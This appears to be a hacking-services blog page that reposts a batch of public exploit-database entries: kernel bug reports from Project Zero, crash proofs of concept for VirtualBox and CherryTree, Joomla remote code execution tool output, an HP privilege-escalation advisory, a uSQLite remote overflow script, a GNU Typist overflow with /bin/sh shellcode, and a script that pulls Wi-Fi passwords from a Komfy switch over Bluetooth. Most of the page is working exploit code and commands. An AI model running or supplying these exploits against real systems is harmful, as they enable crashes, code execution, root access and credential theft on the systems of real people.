Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=944
The DxgkDdiEscape handler for 0x70000d5 lacks bounds checks:
...
if ( g_saved_size )
{
escape->size = g_saved_size;
if ( (unsigned int)g_saved_size > 0 )
{
do
{
v5 = v2++;
escape->data[v5] = global_array[v5 + 77];
}
while ( v2 < g_saved_size );
}
return;
}
data = 0i64;
...
if ( escape->size > 0 )
{
do
{
ii = i++;
global_array[ii + 77] = escape->data[ii];
}
while ( i < escape->size );
...
g_saved_size = escape->size;
This handler copies data to/from a global array, but lacks any form of bounds checking, as
|escape->size| is controlled by the user. This leads to overflow of the global buffer, and pool overflows
when it's copied back into the escape data.
A PoC is attached that should cause a crash (Win 10 x64, 372.54):
KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000002, Stack cookie instrumentation code detected a stack-based
buffer overrun.
Arg2: ffffd00022de52c0, Address of the trap frame for the exception that caused the bugcheck
Arg3: ffffd00022de5218, Address of the exception record for the exception that caused the bugcheck
Arg4: 0000000000000000, Reserved
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40666.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863112321
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=837
TL;DR
you cannot hold or use a task struct pointer and expect the euid of that task to stay the same.
Many many places in the kernel do this and there are a great many very exploitable bugs as a result.
********
task_t is just a typedef for a task struct *. It's the abstraction level which represents a whole task
comprised of threads and a virtual memory map.
task_t's have a corrisponding mach port type (IKOT_TASK) known as a task port. The task port structure
in the kernel has a pointer to the task struct which it represents. If you have send rights to a task port then
you have control over its VM and, via task_threads, its threads.
When a suid-root binary is executed the kernel invalidates the old task and thread port structures setting their
object pointers to NULL and allocating new ports instead.
CVE-2016-1757 was a race condition concerning the order in which those port structures were invalidated during the
exec operation.
Although the issues I will describe in this bug report may seem similar is is a completely different, and far worse,
bug class.
~~~~~~~~~
When a suid binary is executed it's true that the task's old task and thread ports get invalidated, however, the task
struct itself stays the same. There's no fork and no creation of a new task. This means that any pointers to that task struct
now point to the task struct of an euid 0 process.
There are lots of IOKit drivers which save task struct pointers as members; see my recent bug reports for some examples.
In those cases I reported there was another bug, namely that they weren't taking a reference on the task struct meaning
that if we killed the corrisponding task and then forked and exec'ed a suid root binary we could get the IOKit object
to interact via the task struct pointer with the VM of a euid 0 process. (You could also break out of a sandbox by
forcing launchd to spawn a new service binary which would reuse the free'd task struct.)
However, looking more closely, even if those IOKit drivers *do* take a reference on the task struct it doesn't matter!
(at least not when there are suid binaries around.) Just because the userspace client of the user client had send rights
to a task port at time A when it passed that task port to IOKit doesn't mean that it still has send rights to it when
the IOKit driver actually uses the task struct pointer... In the case of IOSurface this lets us trivially map any RW area
of virtual memory in an euid 0 process into ours and write to it. (See the other exploit I sent for that IOSurface bug.)
There are a large number of IOKit drivers which do this (storing task struct pointers) and then either use the to manipulate
userspace VM (eg IOAcceleratorFamily2, IOThunderboltFamily, IOSurface) or rely on that task struct pointer to perform
authorization checks like the code in IOHIDFamily.
Another interesting case to consider are task struct pointers on the stack.
in the MIG files for the user/kernel interface task ports are subject to the following intran:
type task_t = mach_port_t
#if KERNEL_SERVER
intran: task_t convert_port_to_task(mach_port_t)
where convert_port_to_task is:
task_t
convert_port_to_task(
ipc_port_t port)
{
task_t task = TASK_NULL;
if (IP_VALID(port)) {
ip_lock(port);
if ( ip_active(port) &&
ip_kotype(port) == IKOT_TASK ) {
task = (task_t)port->ip_kobject;
assert(task != TASK_NULL);
task_reference_internal(task);
}
ip_unlock(port);
}
return (task);
}
This converts the task port into the corrisponding task struct pointer. It takes a reference on the task struct but that only
makes sure that it doesn't get free'd, not that its euid doesn't change as the result of the exec of an suid root binary.
As soon as that port lock is dropped the task could exec a suid-root binary and although this task port would no longer be valid
that task struct pointer would remain valid.
This leads to a huge number of interesting race conditions. Grep the source for all .defs files which take a task_t to find them all ;-)
In this exploit PoC I'll target perhaps the most interesting one: task_threads.
Let's look at how task_threads actually works, including the kernel code which is generated by MiG:
In task_server.c (an autogenerated file, build XNU first if you can't find this file) :
target_task = convert_port_to_task(In0P->Head.msgh_request_port);
RetCode = task_threads(target_task, (thread_act_array_t *)&(OutP->act_list.address), &OutP->act_listCnt);
task_deallocate(target_task);
This gives us back the task struct from the task port then calls task_threads:
(unimportant bits removed)
task_threads(
task_t task,
thread_act_array_t *threads_out,
mach_msg_type_number_t *count)
{
...
for (thread = (thread_t)queue_first(&task->threads); i < actual;
++i, thread = (thread_t)queue_next(&thread->task_threads)) {
thread_reference_internal(thread);
thread_list[j++] = thread;
}
...
for (i = 0; i < actual; ++i)
((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]);
}
...
}
task_threads uses the task struct pointer to iterate through the list of threads, then creates send rights to them
which get sent back to user space. There are a few locks taken and dropped in here but they're irrelevant.
What happens if that task is exec-ing a suid root binary at the same time?
The relevant parts of the exec code are these two points in ipc_task_reset and ipc_thread_reset:
void
ipc_task_reset(
task_t task)
{
ipc_port_t old_kport, new_kport;
ipc_port_t old_sself;
ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
int i;
new_kport = ipc_port_alloc_kernel();
if (new_kport == IP_NULL)
panic("ipc_task_reset");
itk_lock(task);
old_kport = task->itk_self;
if (old_kport == IP_NULL) {
itk_unlock(task);
ipc_port_dealloc_kernel(new_kport);
return;
}
task->itk_self = new_kport;
old_sself = task->itk_sself;
task->itk_sself = ipc_port_make_send(new_kport);
ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); <-- point (1)
... then calls:
ipc_thread_reset(
thread_t thread)
{
ipc_port_t old_kport, new_kport;
ipc_port_t old_sself;
ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
boolean_t has_old_exc_actions = FALSE;
int i;
new_kport = ipc_port_alloc_kernel();
if (new_kport == IP_NULL)
panic("ipc_task_reset");
thread_mtx_lock(thread);
old_kport = thread->ith_self;
if (old_kport == IP_NULL) {
thread_mtx_unlock(thread);
ipc_port_dealloc_kernel(new_kport);
return;
}
thread->ith_self = new_kport; <-- point (2)
Point (1) clears out the task struct pointer from the old task port and allocates a new port for the task.
Point (2) does the same for the thread port.
Let's call the process which is doing the exec process B and the process doing task_threads() process A and imagine
the following interleaving of execution:
Process A: target_task = convert_port_to_task(In0P->Head.msgh_request_port); // gets pointer to process B's task struct
Process B: ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); // process B invalidates the old task port so that it no longer has a task struct pointer
Process B: thread->ith_self = new_kport // process B allocates new thread ports and sets them up
Process A: ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]); // process A reads and converts the *new* thread port objects!
Note that the fundamental issue here isn't this particular race condition but the fact that a task struct pointer can just
never ever be relied on to have the same euid as when you first got hold of it.
~~~~~~~~~~~~~~~
Exploit:
This PoC exploits exactly this race condition to get a thread port for an euid 0 process. Since we've execd it I just stick a
ret-slide followed by a small ROP payload on the actual stack at exec time then use the thread port to set RIP to a gadget
which does a large add rsp, X and pop's a shell :)
just run it for a while, it's quite a tight race window but it will work! (try a few in parallel)
tested on OS X 10.11.5 (15F34) on MacBookAir5,2
######################################
A faster exploit which also defeats the mitigations shipped in MacOS 10.12. Should work for all kernel versions <= 10.12
######################################
Fixed: https://support.apple.com/en-us/HT207275
Disclosure timeline:
2016-06-02 - Ian Beer reports "task_t considered harmful issue" to Apple
2016-06-30 - Apple requests 60 day disclosure extension.
2016-07-12 - Project Zero declines disclosure extension request.
2016-07-19 - Meeting with Apple to discuss disclosure timeline.
2016-07-21 - Followup meeting with Apple to discuss disclosure timeline.
2016-08-10 - Meeting with Apple to discuss proposed fix and disclosure timeline.
2016-08-15 - Project Zero confirms publication date will be September 21, Apple acknowledges.
2016-08-29 - Meeting with Apple to discuss technical details of (1) "short-term mitigation" that will be shipped within disclosure deadline, and (2) "long-term fix" that will be shipped after the disclosure deadline.
2016-09-13 - Apple release the "short-term mitigation" for iOS 10
2016-09-13 - Apple requests a restriction on disclosed technical details to only those parts of the issue covered by the short-term mitigation.
2016-09-14 - Project Zero confirms that it will disclose full details without restriction.
2016-09-16 - Apple repeats request to withhold details from the disclosure, Project Zero confirms it will disclose full details.
2016-09-17 - Apple requests that Project Zero delay disclosure until a security update in October.
2016-09-18 - Apple's senior leadership contacts Google's senior leadership to request that Project Zero delay disclosure of the task_t issue
2016-09-19 - Google grants a 5 week flexible disclosure extension.
2016-09-20 - Apple release a "short-term mitigation" for the task_t issue for MacOS 10.12
2016-09-21 - Planned publication date passes.
2016-10-03 - Apple publicly release long-term fix for the task_t issue in MacOS beta release version 10.12.1 beta 3.
2016-10-24 - Apple release MacOS version 10.12.1
2016-10-25 - Disclosure date of "task_t considered harmful"
Project Zero remains committed to a 90-day disclosure window, and will continue to apply disclosure deadlines on all of our vulnerability research findings. A 14 day grace extension is available for cases where a patch is expected shortly after the 90-day time window.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40669.zip
#Exploit Title: Oracle VM VirtualBox 4.3.28 Crash
#Author: sultan albalawi
#Tested on:win7
#open viryualbox -->ctrl+i-->choose file -->double+double+double next
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
print ban
pof1 = "<"
pof2 = "http://"
Crash = "\x41"*19
pof3=">"
vm = pof1+pof2+Crash+pof3+pof1+pof2+Crash+pof3
Crash_file=("Crach.ovf")
file = open(Crash_file, "w")
file.write(vm)
file.close()
print 'file done'.format(Crash_file)
#!/usr/bin/python
### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ###
# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.giuspen.com/cherrytree/
# Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe
# Version: Affects all versions of CherryTree prior to 0.37.6
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Run this python script. It will generate a "PoC-1.ctd" file.
# * Open the file and hover over the link.
# Bonus
# =====
# It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)
# Why?
# ====
# For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when
# trying to draw the contents of the graphical bitmaps.
# Exploit code
# ============
crashfile = '''<?xml version="1.0" ?>
<cherrytree>
<node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
<rich_text link="node 1 '''+ "A"*65534 + '''">MOUSE OVER THIS</rich_text>
</node>
</cherrytree>
'''
with open("PoC-1.ctd", 'w') as f:
f.write(crashfile)
f.close()
Source: https://github.com/XiphosResearch/exploits/tree/master/Joomraa
While analysing the recent Joomla exploit in com_users:user.register we came across a problem with the upload whitelisting. They don't allow files containing <?php, or with the extensions .php and .phtml, but they do allow <?= and .pht files, which works out of the box on most hosting environments, including the standard Ubuntu LAMP install, as per:
<FilesMatch ".+\.ph(p[345]?|t|tml)$">
SetHandler application/x-httpd-php
</FilesMatch>
Usage
Choose the username, password and e-mail address to use and point it at the URL for your Joomla website. Use the -x and -s options to customise exploit behaviour, -s searches for the given string in the output after running the PHP file (specified in -x), an example is provided which proves remote code execution.
$ ./joomraa.py -u hacker -p password -e hacker@example.com http://localhost:8080/joomla
@@@ @@@@@@ @@@@@@ @@@@@@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@
@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@
@@! @@! @@@ @@! @@@ @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ @@!
!@! !@! @!@ !@! @!@ !@! !@! !@! !@! @!@ !@! @!@ !@! @!@ !@
!!@ @!@ !@! @!@ !@! @!! !!@ @!@ @!@!!@! @!@!@!@! @!@!@!@! @!@
!!! !@! !!! !@! !!! !@! ! !@! !!@!@! !!!@!!!! !!!@!!!! !!!
!!: !!: !!! !!: !!! !!: !!: !!: :!! !!: !!! !!: !!!
!!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!: !:! :!: !:! :!:
::: : :: ::::: :: ::::: :: ::: :: :: ::: :: ::: :: ::: ::
: ::: : : : : : : : : : : : : : : : : : :::
[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[+] Admin Login Success!
[+] Getting media options
[+] Setting media options
[*] Uploading exploit.pht
[*] Uploading exploit to: http://localhost:8080/joomla/images/OGBUHCF5F.pht
[*] Calling exploit
[$] Exploit Successful!
[*] SUCCESS: http://localhost:8080/joomla
Full Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40637.zip
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/HP-TOUCHSMART-CALENDAR-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec
Vendor:
==========
www.hp.com
Product:
===========================================
Hewlett Packard TouchSmart Calendar Service
File version : 4.1.4245
HP TouchSmart Calendar is a shared calendar where you can manage your family’s schedule. You can also view scheduled events for today
and tomorrow, e-mail calendar events with Google mail, and print your schedule.
Vulnerability Type:
=====================
Privilege Escalation
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
HP Calendar Service uses weak insecure permissions settings on its files/directory as the “Everyone” group has full access on it.
Allowing low privileged users to execute arbitrary code in the security context of ANY other users with elevated privileges
on the affected system.
Any user (even guest) will be able to replace, modify or change the file. This would allow an attacker the ability to inject code
or replace the "HPTouchSmartSyncCalReminderApp.exe" executable and have it run in the context of the system.
Proof...
c:\Windows\System32>sc query "HP Support Assistant Service"
SERVICE_NAME: HP Support Assistant Service
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
c:\>cacls "C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service"
C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service Everyone:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
Disclosure Timeline:
======================================
Vendor Notification: October 14, 2016
Vendor response: Product past warranty support
October 26, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
#!/usr/bin/python
# Exploit Title: Remote buffer overflow vulnerability in uSQLite 1.0.0 PoC
# Date: 27/10/1016
# Exploit Author: Peter Baris
# Software Link: https://sourceforge.net/projects/usqlite/?source=directory
# Version: 1.0.0
# Tested on: windows 7 and XP SP3
# Longer strings will cause heap based overflow
# usage: python usqlite.py <host address>
# Output in the debugger
# EAX 0000038C
# ECX 00B0DA10
# EDX 0000038C
# EBX 41414141
# ESP 0028F8D0 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
# EBP 41414141
# ESI 41414141
# EDI 41414141
# EIP 42424242 <-- EIP is under control, but depending on the OS version, you might have issues finding a jump spot without DEP and ASLR.
###############################################################################################################################################
import socket
import sys
if len(sys.argv)<=1:
print("Usage: python usqlite.py hostname")
sys.exit()
hostname=sys.argv[1]
port = 3002
buffer = "A"*259+"B"*4+"C"*360
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((hostname,port))
sock.send(buffer +'\r\n')
sock.recv(1024)
sock.close()
# Exploit developed using Exploit Pack v6.5
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
# jsacco@exploitpack.com
# Program affected: GNU Typist
# Affected value: ARG0
# Version: 2.9.5-2
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: Simple ncurses touch typing tutor
# Displays exercise lines, measures your typing speed and
# accuracy, and displays the results
# Kali Linux 2.0 package: pool/main/g/gtypist/gtypist_2.9.5-2_i386.deb
# MD5sum: 7ca59c5c0c494e41735b7be676401357
# Website: http://www.gnu.org/software/gtypist/
# gdb$ run `python -c 'print "A"*4098'`
# 0xb7e95def in __strcpy_chk () from /lib/i386-linux-gnu/libc.so.6
# 0x0804bf30 in ?? ()
# 0xb7dbb5f7 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
# 0x0804c393 in ?? ()
import os, subprocess
def run():
try:
print "# GNU GTypist - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack -
http://exploitpack.com"
# NOPSLED + SHELLCODE + EIP
buffersize = 4098
nopsled = "\x90"*30
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x08\xec\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["gtypist ",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, GNU GTypist - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit GNU GTypist - Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
#!/usr/bin/python
# Exploit Title: Komfy Switch with Camera Wifi Password Disclosure via Bluetooth BLE
# Date: Oct 13, 2016
# Exploit Author: Jason Doyle @_jasondoyle
# Vendor Homepage: http://us.dlink.com/products/connected-home/komfy-switch-with-camera/
# HW Model: DKZ-201S/W
# SW Version: 1.0
# Tested on: Ubuntu 16.04 LTS / Python 2.7
# Disclosure Timeline: 10/11/16 Reported vulnerability to D-Link
# 10/11/16 D-Link responded - The Komfy switch will be discontinued 12/30/16. No fix planned.
# Vulnerability Summary
#It is possible for an unauthenticated, remote attacker to retrieve the Komfy device's associated wifi ssid and password over bluetooth (4.0/BLE).
# Vulnerability Details
#https://github.com/jasondoyle/Komfy-Switch-Wifi-Password-Disclosure
# Author: Jason Doyle @_jasondoyle
# Komfy Switch with Camera wifi password disclosure exploit script
import re, base64
from bluepy.btle import Scanner
from gattlib import GATTRequester
#lookup table to unscramble
base64Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" # '=' used for padding
komfy64Alphabet = "qazwersdfxcvbgtyhnmjklpoiu5647382910+/POIKLMJUYTGHNBVFREWSDCXZAQ$" # '$' used for padding
scanner = Scanner()
devices = scanner.scan(5.0)
bAddr = ""
for dev in devices:
if "6c:72:20" in dev.addr and dev.getValueText(1) and dev.getValueText(7) and dev.getValueText(9):
bAddr = dev.addr
print "[+] Komfy switch found: %s (%s), RSSI=%d dB" % (dev.addr, dev.addrType, dev.rssi)
if not bAddr:
print "No Komfy switches found"
sys.exit(1)
req = GATTRequester(bAddr.encode('ascii','ignore'), False, 'hci0')
req.connect(True, 'public', 'none', 0, 78)
#request SSID
wifiSsid = req.read_by_uuid("0xb006")[0]
reg = re.search(r"(:\s\"(.*)\")", wifiSsid)
wifiSsid = reg.groups()[1].replace("\\","")
#request komfy encoded wifi password
wifiPassKomfy64 = req.read_by_uuid("0xb007")[0]
reg = re.search(r"(:\s\"(.*)\")", wifiPassKomfy64)
wifiPassKomfy64 = reg.groups()[1].replace("\\","")
#convert password to real base64
wifiPassBase64 = ""
for char in wifiPassKomfy64:
i = komfy64Alphabet.index(char)
wifiPassBase64 += base64Alphabet[i]
wifiPass = base64.b64decode(wifiPassBase64)
print "[+] Wifi password found for Komfy Switch [%s] SSID: %s Password: %s" % (bAddr, wifiSsid, wifiPass)
from ftplib import FTP
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: smallftp_mkd_command_DoS_Exploit
# Date: 2016.10.26
# Exploit Author: Greg Priest
